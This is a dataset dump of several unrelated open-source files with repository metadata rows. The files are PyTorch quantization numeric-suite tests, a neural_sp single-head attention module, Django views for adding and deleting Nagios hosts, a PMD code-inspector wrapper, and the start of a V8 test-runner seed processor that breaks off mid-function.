base_name_to_sets_of_related_ops, _wrapped_sigmoid, F.sigmoid)
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_linear, F.linear)
op_to_type_to_weight_extraction_fn = \
get_op_to_type_to_weight_extraction_fn()
op_to_type_to_weight_extraction_fn['call_function'][_wrapped_linear] = \
torch.ao.ns.fx.weight_utils.get_linear_fun_weight
# test compare weights
results = extract_weights(
'a', m1, 'b', m2,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops,
op_to_type_to_weight_extraction_fn=op_to_type_to_weight_extraction_fn)
self.assertTrue(len(results) == 1)
self.assertTrue(len(results['_wrapped_linear']['weight']) == 2)
# test unshadowed activations
m1_ns, m2_ns = _add_loggers_impl(
'a', copy.deepcopy(m1), 'b', copy.deepcopy(m2), OutputLogger,
should_log_inputs=False,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops)
# calibrate
m1_ns(data)
m2_ns(data)
# check activation result correctness
act_compare_dict = extract_logger_info(m1_ns, m2_ns, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 3)
self.assert_ns_compare_dict_valid(act_compare_dict)
# test shadowed activations
node_type_to_io_type_map = get_node_type_to_io_type_map()
node_type_to_io_type_map['funs_io_type_fp32'].add(_wrapped_hardswish)
node_type_to_io_type_map['funs_io_type_fp32'].add(_wrapped_sigmoid)
m2_shadows_m1_ns = _add_shadow_loggers_impl(
'a', m2, 'b', m1, OutputLogger,
should_log_inputs=False,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops,
node_type_to_io_type_map=node_type_to_io_type_map)
# calibrate
m2_shadows_m1_ns(data)
# check activation result correctness
act_compare_dict = extract_shadow_logger_info(
m2_shadows_m1_ns, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 2)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, enable after"
"dtype inference is supported")
def test_layer_names(self):
m = nn.Sequential(
nn.Conv2d(1, 1, 1),
nn.Conv2d(1, 1, 1),
nn.Sigmoid(),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
# extract weights
results = extract_weights('fp32', mp, 'int8', mq)
mq_node_names = [node.name for node in mq.graph.nodes]
for layer_name in results.keys():
self.assertTrue(layer_name in mq_node_names)
# match activations
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_ns, mq_ns = add_loggers(
'fp32', copy.deepcopy(mp), 'int8', mq, OutputLogger)
data = torch.randn(1, 1, 1, 1)
mp_ns(data)
mq_ns(data)
results = extract_logger_info(mp_ns, mq_ns, OutputLogger, 'int8')
mq_node_names = [node.name for node in mq_ns.graph.nodes]
for layer_name in results.keys():
self.assertTrue(layer_name in mq_node_names)
# match shadow activations
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers(
'fp32', mp, 'int8', mq, OutputLogger)
mp_shadows_mq(data)
results = extract_shadow_logger_info(
mp_shadows_mq, OutputLogger, 'int8')
mq_node_names = [node.name for node in mp_shadows_mq.graph.nodes]
for layer_name in results.keys():
self.assertTrue(layer_name in mq_node_names)
@skipIfNoFBGEMM
def test_extend_logger_results_with_comparison(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1)).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
# extract weights
results = extract_weights('fp32', mp, 'int8', mq)
extend_logger_results_with_comparison(
results, 'fp32', 'int8', compute_sqnr, 'sqnr_int8_vs_fp32')
extend_logger_results_with_comparison(
results, 'fp32', 'int8', compute_normalized_l2_error, 'l2_error_int8_vs_fp32')
extend_logger_results_with_comparison(
results, 'fp32', 'int8', compute_cosine_similarity,
'cosine_similarity_int8_vs_fp32')
for layer_name, layer_results in results.items():
assert 'sqnr_int8_vs_fp32' in \
layer_results['weight']['int8'][0].keys()
assert 'l2_error_int8_vs_fp32' in \
layer_results['weight']['int8'][0].keys()
assert 'cosine_similarity_int8_vs_fp32' in \
layer_results['weight']['int8'][0].keys()
@skipIfNoFBGEMM
def test_int8_shadows_fp32_simple(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1), nn.ReLU()).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mq_ref = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers(
'int8', mq, 'fp32', mp, OutputLogger)
# verify that scale and zp were extracted correctly
# for the first op, the scale+zp live as attributes on the module
scale_0 = mp_shadows_mq._0_input_scale_0
scale_0_ref = getattr(mq_ref, '0_input_scale_0')
self.assertEqual(scale_0, scale_0_ref)
zp_0 = mp_shadows_mq._0_input_zero_point_0
zp_0_ref = getattr(mq_ref, '0_input_zero_point_0')
self.assertEqual(zp_0, zp_0_ref)
# for the second op, the scale and zp of input to second op
# must equal to scale and zp of output of first op
scale_1 = mp_shadows_mq._1_input_scale_0
scale_1_ref = getattr(mq_ref, '0').scale
self.assertEqual(scale_1, scale_1_ref)
zp_1 = mp_shadows_mq._1_input_zero_point_0
zp_1_ref = getattr(mq_ref, '0').zero_point
self.assertEqual(zp_1, zp_1_ref)
# verify running data works
mp_shadows_mq(torch.randn(1, 1, 1, 1))
act_compare_dict = extract_shadow_logger_info(
mp_shadows_mq, OutputLogger, 'fp32')
self.assertTrue(len(act_compare_dict) == 2)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
def test_int8_shadows_fp32_coverage(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.adaptive_avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv = nn.Conv2d(1, 1, 1)
def forward(self, x):
x = self.adaptive_avg_pool(x)
# input qparams of conv will be input qparams of adaptive_avg_pool
x = self.conv(x)
x = torch.mul(x, x)
x = self.conv(x)
x = torch.add(x, x)
x = F.relu(x)
x = self.conv(x)
return x
m = M().eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = torch.ao.quantization.quantize_fx.prepare_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mq = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mq_ref = torch.ao.quantization.quantize_fx.convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers(
'int8', mq, 'fp32', mp, OutputLogger)
mp_shadows_mq(torch.randn(1, 1, 1, 1))
act_compare_dict = extract_shadow_logger_info(
mp_shadows_mq, OutputLogger, 'fp32')
self.assertTrue(len(act_compare_dict) == 4)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
def test_loggers_preserve_qat_numerics(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1))
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
mp = prepare_qat_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mc = convert_fx(copy.deepcopy(mp))
mp.apply(torch.ao.quantization.disable_observer)
datum = torch.randn(1, 1, 1, 1)
ref_fp32 = mp(datum)
ref_int8 = mc(datum)
mp_ns, mc_ns = add_loggers('fp32', mp, 'int8', mc, OutputLogger)
ref_fp32_ns = mp_ns(datum)
ref_int8_ns = mc_ns(datum)
self.assertEqual(ref_fp32, ref_fp32_ns)
self.assertEqual(ref_int8, ref_int8_ns)
@skipIfNoFBGEMM
def test_shadow_loggers_preserve_qat_numerics(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1), nn.Conv2d(1, 1, 1))
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
mp = prepare_qat_fx(m, qconfig_dict)
mp(torch.randn(1, 1, 1, 1))
mc = convert_fx(copy.deepcopy(mp))
mp.apply(torch.ao.quantization.disable_observer)
datum = torch.randn(1, 1, 1, 1)
ref_fp32 = mp(datum)
ref_int8 = mc(datum)
mc_shadows_mp = add_shadow_loggers('int8', mc, 'fp32', mp, OutputLogger)
ref_shadow = mc_shadows_mp(datum)
self.assertEqual(ref_fp32, ref_shadow)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_extract_weights_cuda(self):
# Note: this is not using quantization because quantized kernels do not
# work on cuda yet.
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
results = extract_weights('a', m1, 'b', m2)
extend_logger_results_with_comparison(
results, 'a', 'b', compute_sqnr, 'sqnr')
self.assert_ns_compare_dict_valid(results)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_add_loggers_cuda(self):
# Note: this is not using quantization because quantized kernels do not
# work on cuda yet.
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m1_ns, m2_ns = add_loggers('a', m1, 'b', m2, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
datum = datum.cuda()
m1_ns(datum)
m2_ns(datum)
act_compare_dict = extract_logger_info(m1_ns, m2_ns, OutputLogger, 'b')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_add_shadow_loggers_cuda(self):
# Note: this is not using quantization because quantized kernels do not
# work on cuda yet.
m1 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m2 = nn.Sequential(nn.Conv2d(1, 1, 1)).cuda()
m1_shadows_m2 = add_shadow_loggers('a', m1, 'b', m2, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
datum = datum.cuda()
m1_shadows_m2(datum)
act_compare_dict = extract_shadow_logger_info(m1_shadows_m2, OutputLogger, 'b')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
class TestFXNumericSuiteCoreAPIsModels(FXNumericSuiteQuantizationTestCase):
"""
Tests numeric suite core APIs on non-toy models.
"""
@skipIfNoFBGEMM
def test_compare_weights_conv(self):
test_cases = (
(ConvModel(),),
(ConvBnModel(),),
(ConvBnReLUModel(),),
)
for m, in test_cases:
m.eval()
self._test_extract_weights(m, results_len=1)
@skipIfNoFBGEMM
def test_compare_weights_linear(self):
test_cases = (
(SingleLayerLinearModel(), None),
(
SingleLayerLinearDynamicModel(),
{"object_type": [(nn.Linear, default_dynamic_qconfig)]},
),
)
for m, qconfig_dict in test_cases:
m.eval()
res = self._test_extract_weights(
m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_weights_lstm_dynamic(self):
qconfig_dict = {"object_type": [(nn.LSTM, default_dynamic_qconfig)]}
m = LSTMwithHiddenDynamicModel().eval()
res = self._test_extract_weights(
m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_activations_conv(self):
test_cases = (
(ConvModel(),),
(ConvBnModel(),),
(ConvBnReLUModel(),),
)
for m, in test_cases:
m.eval()
res = self._test_match_activations(
m, (torch.randn(1, 3, 4, 4),), results_len=1)
@skipIfNoFBGEMM
def test_compare_activations_linear(self):
test_cases = (
(SingleLayerLinearModel(), None),
(
SingleLayerLinearDynamicModel(),
{"object_type": [(nn.Linear, default_dynamic_qconfig)]},
),
)
for m, qconfig_dict in test_cases:
m.eval()
res = self._test_match_activations(
m, (torch.randn(5, 5),), results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_activations_lstm_dynamic(self):
qconfig_dict = {"object_type": [(nn.LSTM, default_dynamic_qconfig)]}
m = LSTMwithHiddenDynamicModel().eval()
lstm_input = torch.rand((1, 1, 2))
lstm_hidden = (torch.rand(1, 1, 2), torch.rand(1, 1, 2))
# TODO(future PR): enable scripting (quant prepared LSTM not scriptable)
res = self._test_match_activations(
m, (lstm_input, lstm_hidden), results_len=1, qconfig_dict=qconfig_dict,
skip_scripting=True)
@skipIfNoFBGEMM
def test_compare_shadow_activations_conv(self):
test_cases = (
(ConvModel(),),
(ConvBnModel(),),
(ConvBnReLUModel(),),
)
for m, in test_cases:
m.eval()
res = self._test_match_shadow_activations(
m, (torch.randn(1, 3, 4, 4),), results_len=1)
@skipIfNoFBGEMM
def test_compare_shadow_activations_linear(self):
test_cases = (
(SingleLayerLinearModel(), None),
(
SingleLayerLinearDynamicModel(),
{"object_type": [(nn.Linear, default_dynamic_qconfig)]},
),
)
for m, qconfig_dict in test_cases:
m.eval()
res = self._test_match_shadow_activations(
m, (torch.randn(5, 5),), results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_compare_shadow_activations_lstm_dynamic(self):
qconfig_dict = {"object_type": [(nn.LSTM, default_dynamic_qconfig)]}
m = LSTMwithHiddenDynamicModel().eval()
lstm_input = torch.rand((1, 1, 2))
lstm_hidden = (torch.rand(1, 1, 2), torch.rand(1, 1, 2))
# TODO(future PR): enable scripting (quant prepared LSTM not scriptable)
res = self._test_match_shadow_activations(
m, (lstm_input, lstm_hidden), results_len=1, qconfig_dict=qconfig_dict,
skip_scripting=True)
@skipIfNoFBGEMM
def test_sparsenn_compare_activations(self):
for should_log_inputs in (True, False):
sparse_nn = SparseNNModel().eval()
idx = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
x = torch.randn(2, 4)
self._test_match_activations(
sparse_nn, (idx, offsets, x),
results_len=5,
should_log_inputs=should_log_inputs)
@skipIfNoFBGEMM
def test_sparsenn_shadow(self):
for should_log_inputs in (True, False):
sparse_nn = SparseNNModel().eval()
idx = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
x = torch.randn(2, 4)
self._test_match_shadow_activations(
sparse_nn, (idx, offsets, x),
results_len=4,
should_log_inputs=should_log_inputs)
@skip_if_no_torchvision
@skipIfNoFBGEMM
@unittest.skip("TODO: broken by https://github.com/pytorch/pytorch/pull/61687, will enable later")
def test_resnet18(self):
import torchvision
m = torchvision.models.quantization.resnet18(pretrained=False, quantize=False).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
self._test_match_shadow_activations(
m, (torch.randn(1, 3, 224, 224),),
qconfig_dict=qconfig_dict,
should_log_inputs=False)
@skip_if_no_torchvision
@skipIfNoFBGEMM
@unittest.skip("TODO: broken by https://github.com/pytorch/pytorch/pull/61687, will enable later")
def test_mobilenet_v2(self):
import torchvision
m = torchvision.models.quantization.mobilenet_v2(pretrained=False, quantize=False).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
self._test_match_shadow_activations(
m, (torch.randn(1, 3, 224, 224),),
qconfig_dict=qconfig_dict,
should_log_inputs=False)
| 39.231477 | 112 | 0.611902 |
6841bd4b8edadca1f760c87c33024034cc0bd096 | 7,022 | py | Python | neural_sp/models/modules/attention.py | ishine/neural_sp | 7995613541d994976b00d80dcc12e2835163acfb | [
"Apache-2.0"
] | 577 | 2018-09-17T14:39:34.000Z | 2022-03-29T10:48:09.000Z | neural_sp/models/modules/attention.py | ishine/neural_sp | 7995613541d994976b00d80dcc12e2835163acfb | [
"Apache-2.0"
] | 221 | 2019-04-21T01:44:09.000Z | 2022-02-10T02:08:47.000Z | neural_sp/models/modules/attention.py | ishine/neural_sp | 7995613541d994976b00d80dcc12e2835163acfb | [
"Apache-2.0"
] | 139 | 2019-01-09T02:18:00.000Z | 2022-03-29T07:40:08.000Z | # Copyright 2018 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Single-head attention layer."""
import numpy as np
import torch
import torch.nn as nn
class AttentionMechanism(nn.Module):
"""Single-head attention layer.
Args:
kdim (int): dimension of key
qdim (int): dimension of query
atype (str): type of attention mechanisms
adim: (int) dimension of attention space
sharpening_factor (float): sharpening factor in the softmax layer
for attention weights
sigmoid_smoothing (bool): replace the softmax layer for attention weights
with the sigmoid function
conv_out_channels (int): number of channels of conv outputs.
This is used for location-based attention.
conv_kernel_size (int): size of kernel.
            This must be an odd number.
dropout (float): dropout probability for attention weights
lookahead (int): lookahead frames for triggered attention
"""
def __init__(self, kdim, qdim, adim, atype,
sharpening_factor=1, sigmoid_smoothing=False,
conv_out_channels=10, conv_kernel_size=201, dropout=0.,
lookahead=2):
super().__init__()
assert conv_kernel_size % 2 == 1, "Kernel size should be odd for 'same' conv."
self.atype = atype
self.adim = adim
self.sharpening_factor = sharpening_factor
self.sigmoid_smoothing = sigmoid_smoothing
self.n_heads = 1
self.lookahead = lookahead
self.reset()
# attention dropout applied after the softmax layer
self.dropout = nn.Dropout(p=dropout)
if atype == 'no':
raise NotImplementedError
# NOTE: sequence-to-sequence without attention (use the last state as a context vector)
elif atype in ['add', 'triggered_attention']:
self.w_key = nn.Linear(kdim, adim)
self.w_query = nn.Linear(qdim, adim, bias=False)
self.v = nn.Linear(adim, 1, bias=False)
elif atype == 'location':
self.w_key = nn.Linear(kdim, adim)
self.w_query = nn.Linear(qdim, adim, bias=False)
self.w_conv = nn.Linear(conv_out_channels, adim, bias=False)
self.conv = nn.Conv2d(in_channels=1,
out_channels=conv_out_channels,
kernel_size=(1, conv_kernel_size),
stride=1,
padding=(0, (conv_kernel_size - 1) // 2),
bias=False)
self.v = nn.Linear(adim, 1, bias=False)
elif atype == 'dot':
self.w_key = nn.Linear(kdim, adim, bias=False)
self.w_query = nn.Linear(qdim, adim, bias=False)
elif atype == 'luong_dot':
assert kdim == qdim
# NOTE: no additional parameters
elif atype == 'luong_general':
self.w_key = nn.Linear(kdim, qdim, bias=False)
elif atype == 'luong_concat':
self.w = nn.Linear(kdim + qdim, adim, bias=False)
self.v = nn.Linear(adim, 1, bias=False)
else:
raise ValueError(atype)
def reset(self):
self.key = None
self.mask = None
def forward(self, key, value, query, mask=None, aw_prev=None,
cache=False, mode='', trigger_points=None, streaming=False):
"""Forward pass.
Args:
key (FloatTensor): `[B, klen, kdim]`
value (FloatTensor): `[B, klen, vdim]`
query (FloatTensor): `[B, 1, qdim]`
mask (ByteTensor): `[B, qlen, klen]`
aw_prev (FloatTensor): `[B, 1 (H), 1 (qlen), klen]`
cache (bool): cache key and mask
mode: dummy interface for MoChA/MMA
trigger_points (IntTensor): `[B]`
streaming: dummy interface for streaming attention
Returns:
cv (FloatTensor): `[B, 1, vdim]`
aw (FloatTensor): `[B, 1 (H), 1 (qlen), klen]`
attn_state (dict): dummy interface
"""
bs, klen = key.size()[:2]
qlen = query.size(1)
attn_state = {}
if aw_prev is None:
aw_prev = key.new_zeros(bs, 1, klen)
else:
aw_prev = aw_prev.squeeze(1) # remove head dimension
# Pre-computation of encoder-side features for computing scores
if self.key is None or not cache:
if self.atype in ['add', 'triggered_attention',
'location', 'dot', 'luong_general']:
self.key = self.w_key(key)
else:
self.key = key
self.mask = mask
if mask is not None:
assert self.mask.size() == (bs, 1, klen), (self.mask.size(), (bs, 1, klen))
# for batch beam search decoding
if self.key.size(0) != query.size(0):
self.key = self.key[0: 1, :, :].repeat([query.size(0), 1, 1])
if self.atype == 'no':
raise NotImplementedError
elif self.atype in ['add', 'triggered_attention']:
tmp = self.key.unsqueeze(1) + self.w_query(query).unsqueeze(2)
e = self.v(torch.tanh(tmp)).squeeze(3)
elif self.atype == 'location':
conv_feat = self.conv(aw_prev.unsqueeze(1)).squeeze(2) # `[B, ch, klen]`
conv_feat = conv_feat.transpose(2, 1).contiguous().unsqueeze(1) # `[B, 1, klen, ch]`
tmp = self.key.unsqueeze(1) + self.w_query(query).unsqueeze(2)
e = self.v(torch.tanh(tmp + self.w_conv(conv_feat))).squeeze(3)
elif self.atype == 'dot':
e = torch.bmm(self.w_query(query), self.key.transpose(2, 1))
elif self.atype in ['luong_dot', 'luong_general']:
e = torch.bmm(query, self.key.transpose(2, 1))
elif self.atype == 'luong_concat':
query = query.repeat([1, klen, 1])
e = self.v(torch.tanh(self.w(torch.cat([self.key, query], dim=-1)))).transpose(2, 1)
assert e.size() == (bs, qlen, klen), (e.size(), (bs, qlen, klen))
NEG_INF = float(np.finfo(torch.tensor(0, dtype=e.dtype).numpy().dtype).min)
# Mask the right part from the trigger point
if self.atype == 'triggered_attention':
assert trigger_points is not None
for b in range(bs):
e[b, :, trigger_points[b] + self.lookahead + 1:] = NEG_INF
# Compute attention weights, context vector
if self.mask is not None:
e = e.masked_fill_(self.mask == 0, NEG_INF)
if self.sigmoid_smoothing:
aw = torch.sigmoid(e) / torch.sigmoid(e).sum(-1).unsqueeze(-1)
else:
aw = torch.softmax(e * self.sharpening_factor, dim=-1)
aw = self.dropout(aw)
cv = torch.bmm(aw, value)
return cv, aw.unsqueeze(1), attn_state
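if __name__ == '__main__':
    # Minimal smoke-test sketch appended for illustration (not part of the
    # original module); the batch size and dimensions are arbitrary assumptions.
    bs, klen, kdim, qdim, adim = 2, 10, 32, 16, 24
    attn = AttentionMechanism(kdim, qdim, adim, atype='add')
    key = torch.randn(bs, klen, kdim)
    value = torch.randn(bs, klen, kdim)
    query = torch.randn(bs, 1, qdim)
    cv, aw, _ = attn(key, value, query)
    print(cv.size())  # torch.Size([2, 1, 32])
    print(aw.size())  # torch.Size([2, 1, 1, 10])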
| 38.582418 | 99 | 0.561663 |
287962e1d5d953b9ab830ae11eddc68a43bc2963 | 903 | py | Python | nagios/views.py | Cola20150301/nagios | 9a60538705b6d25edea17423c880c61ab43cf8ab | [
"Apache-2.0"
] | null | null | null | nagios/views.py | Cola20150301/nagios | 9a60538705b6d25edea17423c880c61ab43cf8ab | [
"Apache-2.0"
] | null | null | null | nagios/views.py | Cola20150301/nagios | 9a60538705b6d25edea17423c880c61ab43cf8ab | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.shortcuts import render, HttpResponseRedirect, HttpResponse
import json
# Create your views here.
from common.mymako import render_mako_context
from views_main import Nagios
from fetch_nagios import FetchNagios
def home(request):
"""
    Home page
"""
data = FetchNagios().get_host()
return render(request, 'nagios/home.html', data)
def get_host(request):
res = Nagios().get_host_with_nagios()
return HttpResponse(res)
def add_host(request):
if request.method == 'POST':
request = request.POST.copy()
        print(request)
res = Nagios().add_host_with_nagios(request)
return HttpResponse(json.dumps(res))
def del_host(request):
if request.method == 'POST':
        print(1)
request = request.POST.copy()
res = Nagios().del_host_with_nagios(request)
return HttpResponse(json.dumps(res))
| 23.763158 | 71 | 0.679956 |
aa2fe985da4db5dbeb0c5c4bb1b05b5c273297cf | 4,708 | py | Python | hyperstyle/src/python/review/inspectors/pmd/pmd.py | hyperskill/hyperstyle | bf3c6e2dc42290ad27f2d30ce42d84a53241544b | [
"Apache-2.0"
] | 18 | 2020-10-05T16:48:11.000Z | 2022-03-22T04:15:38.000Z | hyperstyle/src/python/review/inspectors/pmd/pmd.py | hyperskill/hyperstyle | bf3c6e2dc42290ad27f2d30ce42d84a53241544b | [
"Apache-2.0"
] | 60 | 2020-10-05T17:01:05.000Z | 2022-01-27T12:46:14.000Z | hyperstyle/src/python/review/inspectors/pmd/pmd.py | hyperskill/hyperstyle | bf3c6e2dc42290ad27f2d30ce42d84a53241544b | [
"Apache-2.0"
] | 6 | 2021-02-09T09:31:19.000Z | 2021-08-13T07:45:51.000Z | import csv
import logging
import os
from pathlib import Path
from typing import Any, Dict, List
from hyperstyle.src.python.review.application_config import LanguageVersion
from hyperstyle.src.python.review.common.file_system import check_set_up_env_variable, new_temp_dir
from hyperstyle.src.python.review.common.subprocess_runner import run_in_subprocess
from hyperstyle.src.python.review.inspectors.base_inspector import BaseInspector
from hyperstyle.src.python.review.inspectors.common import remove_prefix
from hyperstyle.src.python.review.inspectors.inspector_type import InspectorType
from hyperstyle.src.python.review.inspectors.issue import BaseIssue, CodeIssue, IssueDifficulty, IssueType
from hyperstyle.src.python.review.inspectors.pmd.issue_types import PMD_RULE_TO_ISSUE_TYPE
logger = logging.getLogger(__name__)
PMD_DIRECTORY_ENV = 'PMD_DIRECTORY'
check_set_up_env_variable(PMD_DIRECTORY_ENV)
PMD_VERSION_ENV = 'PMD_VERSION'
check_set_up_env_variable(PMD_VERSION_ENV)
PATH_TOOLS_PMD_SHELL_SCRIPT = f'{os.environ[PMD_DIRECTORY_ENV]}/pmd-bin-{os.environ[PMD_VERSION_ENV]}/bin/run.sh'
PATH_TOOLS_PMD_FILES = Path(__file__).parent / 'files'
PATH_TOOLS_PMD_RULES_SET = PATH_TOOLS_PMD_FILES / 'config.xml'
DEFAULT_JAVA_VERSION = LanguageVersion.JAVA_11
class PMDInspector(BaseInspector):
inspector_type = InspectorType.PMD
def __init__(self):
os.chmod(PATH_TOOLS_PMD_SHELL_SCRIPT, 0o777)
@classmethod
def _create_command(cls, path: Path,
output_path: Path,
language_version: LanguageVersion,
n_cpu: int) -> List[str]:
return [
PATH_TOOLS_PMD_SHELL_SCRIPT,
'pmd', '-d', str(path), '-no-cache',
'-R', PATH_TOOLS_PMD_RULES_SET,
'-language', 'java',
'-version', cls._get_java_version(language_version),
'-f', 'csv', '-r', str(output_path),
'-t', str(n_cpu),
]
def inspect(self, path: Path, config: Dict[str, Any]) -> List[BaseIssue]:
with new_temp_dir() as temp_dir:
output_path = Path(temp_dir / 'out.csv')
language_version = config.get('language_version')
if language_version is None:
logger.info(
f"The version of Java is not passed. The version to be used is: {DEFAULT_JAVA_VERSION.value}.",
)
language_version = DEFAULT_JAVA_VERSION
command = self._create_command(path, output_path, language_version, config['n_cpu'])
run_in_subprocess(command)
return self.parse_output(output_path)
def parse_output(self, output_path: Path) -> List[BaseIssue]:
"""
Parses the PMD output, which is a csv file, and returns a list of the issues found there.
If the passed path is not a file, an empty list is returned.
"""
if not output_path.is_file():
logger.error('%s: error - no output file' % self.inspector_type.value)
return []
with open(str(output_path)) as out_file:
reader = csv.DictReader(out_file)
return [
CodeIssue(
file_path=Path(row['File']),
line_no=int(row['Line']),
column_no=1,
type=self.choose_issue_type(row['Rule']),
origin_class=row['Rule'],
description=row['Description'],
inspector_type=self.inspector_type,
difficulty=IssueDifficulty.get_by_issue_type(self.choose_issue_type(row['Rule'])),
) for row in reader]
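    # Sketch of the report shape parse_output consumes. Only the columns read
    # above (File, Line, Rule, Description) are shown and the row is invented;
    # a real PMD CSV report contains additional columns.
    #
    #   File,Line,Rule,Description
    #   /tmp/Main.java,3,UnusedLocalVariable,Avoid unused local variables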
@classmethod
def choose_issue_type(cls, rule: str) -> IssueType:
"""
Defines IssueType by PMD rule name using config.
"""
issue_type = PMD_RULE_TO_ISSUE_TYPE.get(rule)
if not issue_type:
logger.warning('%s: %s - unknown rule' %
(cls.inspector_type.value, rule))
return IssueType.BEST_PRACTICES
return issue_type
@staticmethod
def _get_java_version(language_version: LanguageVersion) -> str:
"""
Converts language_version to the version of Java that PMD can work with.
For example, java11 will be converted to 11.
"""
java_version = language_version.value
if not language_version.is_java():
logger.warning(
f"The version passed is not the Java version. The version to be used is: {DEFAULT_JAVA_VERSION.value}.",
)
java_version = DEFAULT_JAVA_VERSION.value
return remove_prefix(java_version, "java")
| 39.898305 | 120 | 0.650595 |
160eac812b9fdd421a7c5104bbcb57320d8dfa62 | 2,009 | py | Python | 3rdParty/V8/v7.9.317/tools/testrunner/testproc/seed.py | rajeev02101987/arangodb | 817e6c04cb82777d266f3b444494140676da98e2 | [
"Apache-2.0"
] | 20,995 | 2015-01-01T05:12:40.000Z | 2022-03-31T21:39:18.000Z | tools/testrunner/testproc/seed.py | Andrea-MariaDB-2/v8 | a0f0ebd7a876e8cb2210115adbfcffe900e99540 | [
"BSD-3-Clause"
] | 9,469 | 2015-01-30T05:33:07.000Z | 2022-03-31T16:17:21.000Z | tools/testrunner/testproc/seed.py | Andrea-MariaDB-2/v8 | a0f0ebd7a876e8cb2210115adbfcffe900e99540 | [
"BSD-3-Clause"
] | 4,523 | 2015-01-01T15:12:34.000Z | 2022-03-28T06:23:41.000Z | # Copyright 2018 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import random
from collections import defaultdict
from . import base
from ..utils import random_utils
class SeedProc(base.TestProcProducer):
def __init__(self, count, seed=None, parallel_subtests=1):
"""
Args:
count: How many subtests with different seeds to create for each test.
0 means infinite.
seed: seed to use. None means random seed for each subtest.
          parallel_subtests: How many subtests of each test to run at the same time.
"""
super(SeedProc, self).__init__('Seed')
self._count = count
self._seed = seed
self._last_idx = defaultdict(int)
self._todo = defaultdict(int)
self._parallel_subtests = parallel_subtests
if count:
self._parallel_subtests = min(self._parallel_subtests, count)
def setup(self, requirement=base.DROP_RESULT):
super(SeedProc, self).setup(requirement)
# SeedProc is optimized for dropping the result
assert requirement == base.DROP_RESULT
def _next_test(self, test):
is_loaded = False
for _ in range(0, self._parallel_subtests):
is_loaded |= self._try_send_next_test(test)
return is_loaded
def _result_for(self, test, subtest, result):
self._todo[test.procid] -= 1
if not self._try_send_next_test(test):
if not self._todo.get(test.procid):
del self._last_idx[test.procid]
del self._todo[test.procid]
self._send_result(test, None)
def _try_send_next_test(self, test):
def create_subtest(idx):
seed = self._seed or random_utils.random_seed()
return self._create_subtest(test, idx, random_seed=seed)
num = self._last_idx[test.procid]
if not self._count or num < self._count:
num += 1
self._todo[test.procid] += 1
